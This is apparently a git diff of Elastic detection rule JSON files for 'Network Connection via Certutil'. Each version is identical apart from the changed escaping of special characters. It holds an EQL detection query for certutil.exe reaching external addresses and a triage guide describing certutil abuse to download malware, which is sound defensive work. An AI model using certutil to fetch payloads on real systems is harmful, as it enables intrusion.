reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"certutil.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_105.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_105.json index aa1743756df..11ce3dff3e6 100644 --- a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Certutil", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"certutil.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_106.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_106.json index 1ae05fcb4a3..0ac6b2b912d 100644 --- a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Certutil", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"certutil.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_107.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_107.json index 5ec8c32fceb..2812ffc3603 100644 --- a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_107.json +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_107.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Certutil", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"certutil.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_108.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_108.json index 8b5c5a32d4d..56e634d8c5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_108.json +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Certutil", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous 